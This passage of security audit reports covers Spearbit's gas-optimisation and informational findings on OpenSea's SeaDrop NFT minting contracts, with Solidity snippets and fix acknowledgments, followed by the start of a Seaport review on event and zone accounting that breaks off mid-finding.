+5.4.3 Immutables which are calculated using keccak256 of a string literal can be made constant

Severity: Informational

Context: SeaDrop.sol#L76, SeaDrop.sol#L80

Description: Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: "Code Generator: Evaluate keccak256 of string literals at compile-time." The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost.

Recommendation: In SeaDrop, _SIGNED_MINT_TYPEHASH and _EIP_712_DOMAIN_TYPEHASH are defined as immutable but can safely be turned into constant.

OpenSea: Will update to a constant.

+5.4.4 Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list

Severity: Gas Optimization

Context: SeaDrop.sol#L54-L68

Description: SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can each be combined into just one mapping. The pairs:
1. _allowedFeeRecipients and _enumeratedFeeRecipients
2. _signers and _enumeratedSigners
3. _tokenGatedDrops and _enumeratedTokenGatedTokens

Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration.

    mapping(address => mapping(address => CustomStructOrBool)) private variable;
    mapping(address => address[]) private _enumeratedVariable;

Recommendation: We can combine each pair into just one variable that maps the address of an nftContract into a (cyclic) doubly-linked list. Then retrievals, insertions, and removals would cost O(1), while iteration would remain O(n). Removal cost is reduced from O(n) to O(1) (this would save gas on any call that triggers _removeFromEnumeration). Also, the storage structure would look simpler. For example, for the case of a bool inner value (_allowedFeeRecipients, _signers), we can define the doubly-linked list node/element as the following struct:

    struct Node {
        bool value;
        address prev;
        address next;
    }

And our mapped variable would be:

    mapping(address => mapping(address => Node)) private variable;

We can use the address 0x1 as the flagged address (start/end) of our doubly-linked list. Related: Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.
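A minimal sketch of the cyclic doubly-linked list suggested above for the bool-valued case, with 0x1 as the sentinel (all names are illustrative):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.11;

    /// Illustrative sketch only: one mapping per nftContract gives O(1)
    /// insertion and removal while still supporting iteration from the
    /// sentinel address 0x1.
    abstract contract LinkedListEnumerationSketch {
        address internal constant SENTINEL = address(1);

        struct Node {
            bool value;
            address prev;
            address next;
        }

        // nftContract => (member => Node)
        mapping(address => mapping(address => Node)) internal _set;

        function _insert(address nftContract, address member) internal {
            mapping(address => Node) storage list = _set[nftContract];
            if (list[member].value) return; // already present

            address head = list[SENTINEL].next;
            if (head == address(0)) head = SENTINEL; // empty list: cycle on the sentinel

            // Splice the new node in right after the sentinel.
            list[member] = Node({value: true, prev: SENTINEL, next: head});
            list[head].prev = member;
            list[SENTINEL].next = member;
        }

        function _remove(address nftContract, address member) internal {
            mapping(address => Node) storage list = _set[nftContract];
            Node storage node = list[member];
            if (!node.value) return; // not present

            // O(1) unlink: no iteration over an enumeration array needed.
            list[node.prev].next = node.next;
            list[node.next].prev = node.prev;
            delete list[member];
        }
    }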
+5.4.5 The onlyAllowedSeaDrop modifier is redundant

Severity: Gas Optimization

Context:
• ERC721SeaDrop.sol#L65-L74,
• ERC721SeaDrop.sol#L157,
• ERC721SeaDrop.sol#L184,
• ERC721SeaDrop.sol#L213,
• ERC721SeaDrop.sol#L232,
• ERC721SeaDrop.sol#L265,
• ERC721SeaDrop.sol#L290,
• ERC721SeaDrop.sol#L306,
• ERC721SeaDrop.sol#L324,
• ERC721SeaDrop.sol#L346

Description: The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdministrator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant.

Recommendation: Remove the onlyAllowedSeaDrop modifier. As an additional note, keep in mind that the onlySeaDrop modifier is indeed useful. It is used on a function where checking against the stored allowed SeaDrop registry list for this contract is relevant. Without the onlySeaDrop modifier, anyone could call the mintSeaDrop endpoint to mint. It restricts calls to only an allowed msg.sender.

+5.4.6 Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas

Severity: Gas Optimization

Context: ERC721SeaDrop.sol#L48-L52

Description: Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure. This would reduce storage space and save gas when storing or retrieving parameters.

Recommendation: An example of a structure that could be used instead:

    mapping(address => address) private _allowedSeaDrops;

When creating a cyclic linked-list, use a flagged address so that later you will be able to iterate through the list. Say you have been given a list of allowed SeaDrop addresses a; then set _allowedSeaDrops[0x01] = a[0]. This would allow you to iterate later on by fetching the data for 0x01 first. The last address would also need to point to 0x01. Now if _allowedSeaDrops[x] != 0, then x is an allowed SeaDrop address (except 0x01). Here is how some of the functions would look after implementing this type of data structure (rough sketch):

    // ADDRESS_ZERO = address(uint160(0))
    // ADDRESS_ONE = address(uint160(1))

    modifier onlySeaDrop() {
        if (
            _allowedSeaDrop[msg.sender] == ADDRESS_ZERO ||
            msg.sender == ADDRESS_ONE
        ) {
            revert OnlySeaDrop();
        }
        _;
    }

    modifier onlyAllowedSeaDrop(address seaDrop) {
        if (
            _allowedSeaDrop[seaDrop] == ADDRESS_ZERO ||
            seaDrop == ADDRESS_ONE
        ) {
            revert OnlySeaDrop();
        }
        _;
    }

    function updateAllowedSeaDrop(address[] calldata allowedSeaDrop)
        external
        override
        onlyOwnerOrAdministrator
    {
        // Reset the old mapping.
        address seaDrop = _allowedSeaDrop[ADDRESS_ONE];
        while (seaDrop != ADDRESS_ZERO) {
            address nextSeaDrop = _allowedSeaDrop[seaDrop];
            delete _allowedSeaDrop[seaDrop];
            seaDrop = nextSeaDrop;
        }

        seaDrop = ADDRESS_ONE;
        uint256 i;
        uint256 allowedSeaDropLength = allowedSeaDrop.length;

        // Set the new mapping for allowed SeaDrop contracts.
        for (; i < allowedSeaDropLength; ) {
            address nextSeaDrop = allowedSeaDrop[i];
            _allowedSeaDrop[seaDrop] = nextSeaDrop;
            seaDrop = nextSeaDrop;
            unchecked {
                ++i;
            }
        }
        if (allowedSeaDropLength != 0) {
            _allowedSeaDrop[seaDrop] = ADDRESS_ONE;
        }

        // Emit an event for the update.
        emit AllowedSeaDropUpdated(allowedSeaDrop);
    }

Also, the constructor would need to be updated accordingly. Use the above implementation of updateAllowedSeaDrop as a reference.
+5.4.7 Use dropStageDoesNotExist instead of dropStageExists

Severity: Gas Optimization

Context: SeaDrop.sol#L871-L886

Recommendation: Instead of using dropStageExists, we can change it to dropStageDoesNotExist, which would save us 2 NOTs, 1 EQ and 1 PUSH1 0. Modified piece:

    bool dropStageDoesNotExist;
    assembly {
        dropStageDoesNotExist := iszero(sload(existingDropStageData.slot))
    }

    if (addOrUpdateDropStage) {
        _tokenGatedDrops[msg.sender][allowedNftToken] = dropStage;
        // Add to enumeration if it does not exist already.
        if (dropStageDoesNotExist) {
            enumeratedTokens.push(allowedNftToken);
        }
    } else {
        // Check we are not deleting a drop stage that does not exist.
        if (dropStageDoesNotExist) {
            revert TokenGatedDropStageNotPresent();
        }
        // Clear storage slot and remove from enumeration.

Amount of gas saved:

    src/SeaDrop.sol:SeaDrop contract
      Function Name         min   avg    median  max    # calls
    - updateTokenGatedDrop  7087  72743  93461   97461  25
    + updateTokenGatedDrop  7087  72741  93458   97458  25

OpenSea: Updated in commit ac34900.

+5.4.8 .length should not be looked up in every loop of a for-loop

Severity: Gas Optimization

Context: ERC721SeaDrop.sol#L87, ERC721SeaDrop.sol#L109, ERC721SeaDrop.sol#L117

Description: Reading an array's length at each iteration of a loop consumes more gas than necessary.

Recommendation: Consider caching the array's length in a variable before the for-loop, and use this new variable instead. This should save around 3 gas per iteration.

OpenSea: Fixed in the commit 0b90c9e.

Spearbit: Acknowledged.

+5.4.9 A storage pointer should be cached instead of computed multiple times

Severity: Gas Optimization

Context: SeaDrop.sol#L405-L407, SeaDrop.sol#L417-L419

Description: Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.

Recommendation: Consider declaring mapping(uint256 => bool) storage redeemedTokenIds = _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken];:

    File: SeaDrop.sol

        // Check that the token id has not already been redeemed.
    +   mapping(uint256 => bool) storage redeemedTokenIds =
    +       _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken];
        if (
    -       _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][
    -           tokenId
    -       ] == true
    +       redeemedTokenIds[tokenId] == true
        ) {
            revert TokenGatedTokenIdAlreadyRedeemed(
                nftContract,
                mintParams.allowedNftToken,
                tokenId
            );
        }

        // Mark the token id as redeemed.
    -   _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][
    -       tokenId
    -   ] = true;
    +   redeemedTokenIds[tokenId] = true;

Amount of gas saved: [gas table not recovered]

OpenSea: Fixed in commit 3febba4.

Spearbit: Acknowledged.

+5.4.10 Comparing a boolean to a constant

Severity: Gas Optimization

Context: SeaDrop.sol#L407, SeaDrop.sol#L469-L470

Description: Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value.

Recommendation: Consider applying the following:

        if (
            _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][
                tokenId
    -       ] == true
    +       ]
        ) {

    ...

    -   if (restrictFeeRecipients == true)
    +   if (restrictFeeRecipients)

    -   if (_allowedFeeRecipients[nftContract][feeRecipient] == false) {
    +   if (!_allowedFeeRecipients[nftContract][feeRecipient]) {

OpenSea: This was fixed in previous commits in the branch; found one more instance in the commit 16a4837.
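A compact sketch pulling together the loop-related suggestions above, i.e. 5.4.8's cached array length and 5.4.10's direct boolean checks (the contract and function names are illustrative):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.11;

    /// Illustrative sketch only: cache the array length once before the loop
    /// (5.4.8) and check booleans directly instead of comparing them to
    /// constants (5.4.10).
    contract LoopMicroOptimizationsSketch {
        mapping(address => bool) public allowed;

        function countAllowed(address[] calldata accounts)
            external
            view
            returns (uint256 count)
        {
            // Cache the length instead of re-reading accounts.length each iteration.
            uint256 length = accounts.length;
            for (uint256 i = 0; i < length; ) {
                // Direct boolean check, not `== true`.
                if (allowed[accounts[i]]) {
                    unchecked {
                        ++count;
                    }
                }
                unchecked {
                    ++i;
                }
            }
        }
    }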
5.5 Informational

+5.5.1 mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting

Severity: Informational

Context: SeaDropStructs.sol#L58

Description: maxTokenSupplyForStage is stored in a uint40 (after this audit, uint32), which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder.

Recommendation: It would be best to warn the owner that mintAllowList, mintSigned, or mintAllowedTokenHolder cannot mint tokens with a tokenID greater than 2^40 − 1. Basically, the early drop mints are limited to this range, since maxTokenSupplyForStage is not uint256.

OpenSea: mintSigned and mintAllowList have maxTokenSupplyForStage as uint256 since they are not stored on chain, but this is true for mintAllowedTokenHolder where the struct is stored on chain. Notes added in commit 0c05761.

Spearbit: Acknowledged.

+5.5.2 Add warning for NFT contracts to implement authentication properly for updateAllowList

Severity: Informational

Context: SeaDrop.sol#L827

Recommendation: NFT contracts need to be warned to implement authentication properly for allowed-list mints.

OpenSea: Implemented in commit 77ca81f.

Spearbit: Acknowledged.

+5.5.3 Consider replacing minterIfNotPayer parameter to always correspond to the minter

Severity: Informational

Context: SeaDrop.sol#L145

Description: Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender is considered the minter; otherwise, minterIfNotPayer is considered the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well; we recommend calling it minter afterwards.

Recommendation: If the change is implemented, make sure that the backend code is appropriately changed. Supplying the wrong calldata may lead to reverts or loss of funds.

OpenSea: The idea here was to cut down on calldata costs in the case where msg.sender is the minter, which would be most normal use-cases. Zero-value calldata should save ~200 gas in the average case, even with branching, right?

Spearbit: The gas savings sound accurate. However, we should try to simplify the code.

+5.5.4 The interface IERC721ContractMetadata does not extend the IERC721 interface

Severity: Informational

Context: IERC721ContractMetadata.sol#L4

Description: The current interface IERC721ContractMetadata does not include the ERC-721 functions. As a comparison, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface.

Recommendation: Inherit from the IERC721 interface.

OpenSea: This should extend IERC721.

+5.5.5 Add unit tests for mintSigned and mintAllowList in SeaDrop

Severity: Informational

Context: SeaDrop.sol#L259

Description: The only tests for the mintSigned and the mintAllowList functions are fuzz tests.

Recommendation: It would be great to include some basic unit tests for these functions.

OpenSea: We are working on full unit-test coverage in Hardhat! Unit tests with complete contract code coverage have been added. SeaDrop-mintSigned.spec.ts, SeaDrop-mintAllowList.spec.ts

Spearbit: Acknowledged.

+5.5.6 Rename a variable with a misleading name

Severity: Informational

Context: SeaDrop.sol#L1002-L1008

Description: The enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading, since _removeFromEnumeration is also used for signer lists, feeRecipient lists, etc.
Recommendation: Rename enumeratedDropsLength to enumerationLength.

OpenSea: Fixed in commit b970ed4.

Spearbit: Acknowledged.

+5.5.7 The protocol rounds the fees in the favour of creatorPaymentAddress

Severity: Informational

Context: SeaDrop.sol#L576

Description: The feeAmount calculation rounds down, i.e., it rounds in favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (a price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. For example, with price = 3 wei and feeBps = 3000, price * feeBps = 9000 < 10000, so the fee rounds down to 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 while price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings.

Recommendation: There are no recommended actions needed here, except documenting that fees are rounded in favour of the creator.

OpenSea: Fixed in commit d2a9f29.

Spearbit: Acknowledged.

+5.5.8 Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0

Severity: Informational

Context: SeaDrop.sol#L516

Description: The value 0 is currently used as a magic value for maxTokenSupplyForStage, signalling that the check quantity + currentTotalSupply > maxTokenSupplyForStage should be skipped. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for the additional branching if (maxTokenSupplyForStage != MAGIC_VALUE), as the condition quantity + currentTotalSupply > type(uint).max is never true.

Recommendation: Consider implementing the following suggestions:
1. Use type(uint).max instead of 0.
2. Remove the redundant if (maxTokenSupplyForStage != MAGIC_VALUE).
3. If the magic value is kept as 0, consider making it a named constant, and using the name everywhere.

OpenSea: Fixed in commits d4101c2 and cbd5ce5.

Spearbit: Acknowledged.

+5.5.9 Missing edge case tests on uninitialized AllowList

Severity: Informational

Context: SeaDrop.sol#L226-L231

Description: The default value for _allowListMerkleRoots[nftContract] is 0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case.

Recommendation: Add the missing tests.

OpenSea: Test added in commit 66ee1176.

Spearbit: Acknowledged.

+5.5.10 Consider naming state variables as public to replace the user-defined getters

Severity: Informational

Context: SeaDrop.sol#L43

Description: Several state variables, for example mapping(address => PublicDrop) private _publicDrops;, have private visibility but have corresponding getters defined (function getPublicDrop(address nftContract)). Replacing private by public and renaming the variable can decrease the code size. There are several examples of the above pattern in the codebase; however, we are only listing one here for brevity.

Recommendation: For all user-defined getter functions, consider replacing the function by marking the visibility of the corresponding state variable as public. To keep the same name of the getter / ABI, the state variable can be renamed, e.g., from _publicDrops to getPublicDrop.

OpenSea: "Won't fix" as this doesn't seem to play well with the interfaces we've defined.

Spearbit: Acknowledged.
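A minimal sketch of the 5.5.10 suggestion (the struct fields here are illustrative, not the full PublicDrop definition):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.11;

    struct PublicDrop {
        uint80 mintPrice;
        uint16 feeBps;
    }

    contract PublicGetterSketch {
        // Before: a private mapping plus a hand-written getter:
        //
        //   mapping(address => PublicDrop) private _publicDrops;
        //   function getPublicDrop(address nftContract)
        //       external view returns (PublicDrop memory)
        //   { return _publicDrops[nftContract]; }
        //
        // After: the compiler generates getPublicDrop(address) automatically.
        // Note that the generated getter returns the struct's members as a
        // tuple (uint80, uint16) rather than the struct type itself, which is
        // likely why this does not play well with the existing interfaces.
        mapping(address => PublicDrop) public getPublicDrop;
    }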
+5.5.11 Use bytes.concat instead of abi.encodePacked for concatenation

Severity: Informational

Context: SeaDrop.sol#L297-L312

Description: While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat.

Recommendation: Consider using bytes.concat instead of abi.encodePacked for concatenation:

        bytes32 digest = keccak256(
    -       abi.encodePacked(
    +       bytes.concat(
                // EIP-191: `0x19` as set prefix, `0x01` as version byte
                bytes2(0x1901),
                _domainSeparator(),
                keccak256(
                    abi.encode(
                        _SIGNED_MINT_TYPEHASH,
                        nftContract,
                        minter,
                        feeRecipient,
                        mintParams
                    )
                )
            )
        );

OpenSea: Updated in commit 47c50ed.

Spearbit: Acknowledged.

+5.5.12 Misleading comment

Severity: Informational

Context: SeaDrop.sol#L392-L395

Description: The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;.

Recommendation: Consider editing the comment as such:

    -   // Check that the sender is the owner of the allowedNftTokenId.
    +   // Check that the minter is the owner of the allowedNftTokenId.
        if (
            IERC721(mintParams.allowedNftToken).ownerOf(tokenId) != minter
        ) {

OpenSea: Fixed in commit 1bf3225.

Spearbit: Acknowledged.

+5.5.13 Use i instead of j as an index name for a non-nested for-loop

Severity: Informational

Context: SeaDrop.sol#L388

Description: Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising.

Recommendation: Use i instead of j as the index name.

OpenSea: Fixed in commit 318c851.

Spearbit: Acknowledged.

+5.5.14 Avoid duplicating code for consistency

Severity: Informational

Context: SeaDrop.sol#L129-L136, SeaDrop.sol#L196, SeaDrop.sol#L268, SeaDrop.sol#L362

Description: The _checkActive function is used in every mint function besides mintPublic, where the code is almost the same.

Recommendation: Consider maintaining consistency by using _checkActive(publicDrop.startTime, type(uint64).max):

    function mintPublic(
        ...
    -   // Ensure that the drop has started.
    -   if (block.timestamp < publicDrop.startTime) {
    -       revert NotActive(
    -           block.timestamp,
    -           publicDrop.startTime,
    -           type(uint64).max
    -       );
    -   }
    +   _checkActive(publicDrop.startTime, type(uint64).max);

This would also save some deployment cost and some gas on average: [gas table not recovered]

OpenSea: Fixed in commit 7f1456d.

Spearbit: Acknowledged.

+5.5.15 restrictFeeRecipients is always true for either PublicDrop or TokenGatedDrop in ERC721SeaDrop

Severity: Informational

Context:
• ERC721SeaDrop.sol#L168,
• ERC721SeaDrop.sol#L193,
• ERC721SeaDrop.sol#L242,
• ERC721SeaDrop.sol#L273

Description: restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. When either one of these drops gets created/updated by calling one of the four functions below on an ERC721SeaDrop contract, its value is hardcoded as true:
• updatePublicDrop
• updatePublicDropFee
• updateTokenGatedDrop
• updateTokenGatedDropFee

Recommendation: Unless there is a plan to add some functionality for cases when restrictFeeRecipients == false, it would be best to rewrite the contracts to remove this variable and assume it's always true. On the SeaDrop end, there are scenarios where minting with a signature or proof for allowed mints can have restrictFeeRecipients == false.
OpenSea: This logic is now updated so that the admin can set it to false if they would like; see commit cbd5ce5.

+5.5.16 Reformat lines for better readability

Severity: Informational

Context: SeaDrop.sol#L76-L83

Description: These lines are too long to be readable, and a mistake isn't easy to spot.

Recommendation: Reformat these lines into:

    bytes32 internal immutable _SIGNED_MINT_TYPEHASH =
        keccak256(
            "SignedMint("
                "address nftContract,"
                "address minter,"
                "address feeRecipient,"
                "MintParams mintParams"
            ")"
            "MintParams("
                "uint256 mintPrice,"
                "uint256 maxTotalMintableByWallet,"
                "uint256 startTime,"
                "uint256 endTime,"
                "uint256 dropStageIndex,"
                "uint256 maxTokenSupplyForStage," // <--- this was also missing in the audit repo
                "uint256 feeBps,"
                "bool restrictFeeRecipients"
            ")"
        );
    bytes32 internal immutable _EIP_712_DOMAIN_TYPEHASH =
        keccak256(
            "EIP712Domain("
                "string name,"
                "string version,"
                "uint256 chainId,"
                "address verifyingContract"
            ")"
        );

OpenSea: Fixed: fd07a8b.

Spearbit: Acknowledged.

+5.5.17 Comment is a copy-paste

Severity: Informational

Context: SeaDrop.sol#L51, SeaDrop.sol#L54

Description: This comment is exactly the same as this one. This is a copy-paste mistake.

Recommendation: Consider writing another description on L54.

OpenSea: Fixed in commit 8ebff0d.

Spearbit: Acknowledged.

+5.5.18 Replace setBatchTokenURIs()

Severity: Informational

Context: ERC721ContractMetadata.sol#L94-L108

Description: This was discussed with OpenSea: this method should be renamed to something like emitBatchTokenURIUpdated and have the string calldata parameter removed. It was meant as a shortcut for emitting the event when only subsets of token metadata have actually changed, and is mostly informational/instructional.

OpenSea: Fixed in commit b8566fa.

Spearbit: Acknowledged.

+5.5.19 Remove unused imports

Severity: Informational

Context: ERC721ContractMetadata.sol#L6-L27, SeaDrop.sol#L16

Recommendation: Removing the unused imports improves code quality. In ERC721ContractMetadata.sol, the following imports are unused: MaxMintable, TwoStepOwnable, AllowList, Ownable, ECDSA, ConstructorInitializable and IERC721ContractMetadata. In SeaDrop.sol, the import ERC20 is unused.

+5.5.20 Missing comment about PublicDrops endTimestamp

Severity: Informational

Context: lib/SeaDropErrorsAndEvents.sol#L7-L14, SeaDrop.sol#L134

Recommendation: Consider adding a comment that for PublicDrops the endTimestamp value should be type(uint64).max.

OpenSea: Fixed in commits 7f1456d and 27e3435.

Spearbit: Acknowledged.

+5.5.21 Misaligned lines

Severity: Informational

Context: SeaDropErrorsAndEvents.sol#L160-L177

Recommendation: Consider adding indents to align with the other lines.

OpenSea: Fixed in commit 24ed58d.

Spearbit: Acknowledged.

+5.5.22 Usage of floating pragma is not recommended

Severity: Informational

Context:
• SeaDrop.sol#L2,
• ERC721SeaDrop.sol#L2,
• ERC721ContractMetadata.sol#L2,
• lib/SeaDropStructs.sol#L2,
• lib/SeaDropErrorsAndEvents.sol#L2,
• interfaces/ISeaDrop.sol#L2,
• interfaces/IERC721SeaDrop.sol#L2,
• interfaces/IERC721ContractMetadata.sol#L2

Description:
• ^0.8.11 is declared in the files.
• In foundry.toml: solc_version = '0.8.15' is used for the default build profile.
• In hardhat.config.ts and hardhat-coverage.config.ts: "0.8.14" is used.

Recommendation: Consider documenting the actual compiler version and flags used to get the compiled bytecode which is going to be deployed on-chain.

OpenSea: Fixed in commit 9d87bfc.

Spearbit: Acknowledged.
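A minimal sketch of pinning the compiler version consistently across the toolchain, per 5.5.22 (the exact version chosen here is illustrative):

    // SPDX-License-Identifier: MIT
    // Pin an exact compiler version instead of the floating ^0.8.11 range,
    // and keep it in sync with the build configuration, e.g. in foundry.toml:
    //
    //   solc_version = '0.8.15'
    //
    // and in hardhat.config.ts:
    //
    //   solidity: { version: "0.8.15" },
    //
    pragma solidity 0.8.15;

    contract PinnedPragmaSketch {}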
diff --git a/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt new file mode 100644 index 0000000..68c0180 --- /dev/null +++ b/findings_newupdate/spearbit/Seaport-Spearbit-Security-Review.txt @@ -0,0 +1,92 @@

+5.1.1 The spent offer amounts provided to OrderFulfilled for a collection of (advanced) orders are not the actual amounts spent in general

Severity: Medium Risk

Context:
• OrderCombiner.sol#L455-L463
• OrderFulfiller.sol#L377-L385

Description: When Seaport is called to fulfill or match a collection of (advanced) orders, the OrderFulfilled event is emitted before applying fulfillments and executing transfers. The offer and consideration items have the following forms:

    C = (I_t, T, i, a_curr, R, a_curr)
    O = (I_t, T, i, a_curr, a_curr)

where

    parameter  description
    I_t        itemType
    T          token
    i          identifier
    a_curr     the interpolation of startAmount and endAmount depending on the time and the fraction of the order
    R          consideration item's recipient
    O          offer item
    C          consideration item

The SpentItem and ReceivedItem items provided to the OrderFulfilled event ignore the last component of the offer/consideration items in the above form, since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.a_curr might not be the amount spent for this offer item, yet OrderFulfilled emits O.a_curr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. The fulfillOrder and fulfillAdvancedOrder endpoints do not have this issue, since all items are enforced to be used. These two endpoints also differ from the collection-of-(advanced)-orders endpoints in that they emit OrderFulfilled at the end of their call, before clearing the reentrancy guard.

Recommendation: Make sure the accounting is updated to only provide the spent offer item amounts to OrderFulfilled. Moving the emission of this event to the end of the call flow, before clearing the reentrancy guard like the above-mentioned simpler endpoints, would make it easier to provide the correct values (and would also make the whole flow between different endpoints more consistent and potentially create an opportunity to refactor the codebase further).

Seaport: Fixed in PR 839 by making sure all unspent offer amounts are transferred to the recipient provided by the msg.sender.

Spearbit: Verified.

+5.1.2 The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type are not the actual spent amounts in general

Severity: Medium Risk

Context:
• OrderCombiner.sol#L802-L807
• ConsiderationEncoder.sol#L440-L443
• ZoneInterface.sol#L13-L15
• ContractOffererInterface.sol#L16-L22
• OrderCombiner.sol#L322-L325
• FulfillmentApplier.sol#L299-L306
• FulfillmentApplier.sol#L432-L433
• FulfillmentApplier.sol#L120-L125
• OrderCombiner.sol#L794-L798

Description: When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used.
When not all of the current amount of an offer item is used, and this offer item belongs to an order which is either of CONTRACT order type or is a restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or the zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent. When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases:

    parameter  description
    I_t        itemType
    T          token
    i          identifier
    a_s        startAmount
    a_e        endAmount
    a_curr     the interpolation of startAmount and endAmount depending on the time and the fraction of the order
    O          offer item

• Let's assume an offer item is originally O = (I_t, T, i, a_s, a_e).
• In _validateOrdersAndPrepareToFulfill, O gets transformed into (I_t, T, i, a_curr, a_curr).
• Then, depending on whether the order is part of a match (1, 2, 3) or fulfillment (1, 2) order and whether there is corresponding fulfillment data pointing at this offer item, it might transform into (I_t, T, i, b, a_curr) where b ∈ [0, a_curr]. For fulfilling a collection of orders, b ∈ {0, a_curr} depending on whether the offer item gets used or not, but for match orders it can lie in the more general range b ∈ [0, a_curr].
• And finally, for restricted or CONTRACT order types, before calling _assertRestrictedAdvancedOrderValidity, the offer item would be transformed into (I_t, T, i, a_curr, a_curr).

So the startAmount of an offer item goes through the following flow:

    a_s → a_curr → b ∈ [0, a_curr] → a_curr

And at the end, a_curr is the amount used when Seaport calls into the validateOrder of a zone or the ratifyOrder of a contract offerer. a_curr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer.

Recommendation: For a non-matched collection of (advanced) orders, the actual spent amount for an offer item is a_curr − b ∈ {0, a_curr}, which basically reflects whether the item has been used or not. So for these 2 Seaport endpoints (fulfillAvailableOrders, fulfillAvailableAdvancedOrders), one can calculate the actual spent amount. For example, at the end of the flow for startAmount, one can do:

    // Utilize assembly to calculate the spent amount.
    assembly {
        let startAmountPtr := add(offerItem, Common_amount_offset)
        let originalAmount := mload(add(offerItem, Common_endAmount_offset))
        let unusedAmount := mload(startAmountPtr)
        mstore(startAmountPtr, sub(originalAmount, unusedAmount))
    }

For matched orders, since in certain scenarios b can be any number in B256, it would be hard to say how much of that particular offer item was spent or not spent, and so the above suggestion would not work in general for matched orders.

Seaport: Fixed in PR 839 by making sure all unspent offer amounts are transferred to the recipient provided by the msg.sender.

Spearbit: Verified.

+5.1.3 Empty criteriaResolvers for criteria-based contract orders

Severity: Medium Risk

Context:
• OrderValidator.sol#L312-L315
• CriteriaResolution.sol#L119

Description: There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria-based itemType when identifierOrCriteria for the original item is 0, i.e., when offering from an entire collection.
Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders, such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct. See the following test:

    modified   test/advanced.spec.ts
    @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
         // Seller approves marketplace contract to transfer NFTs
         await set1155ApprovalForAll(seller, marketplaceContract.address, true);

    -    const { root, proofs } = merkleTree([nftId]);
    -    const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))];
    +    const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))];

         const consideration = [
           getItemETH(parseEther("10"), parseEther("10"), seller.address),
    @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
           getItemETH(parseEther("1"), parseEther("1"), owner.address),
         ];

    +    // Replacing by `const criteriaResolvers = []` will revert
         const criteriaResolvers = [
    -      buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]),
    +      buildResolver(0, 0, 0, nftId, []),
         ];

         const { order, orderHash, value } = await createOrder(

However, in the case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided, as the itemType was already updated to be the corresponding non-criteria-based itemType. See advanced.spec.ts#L510 for a test case.

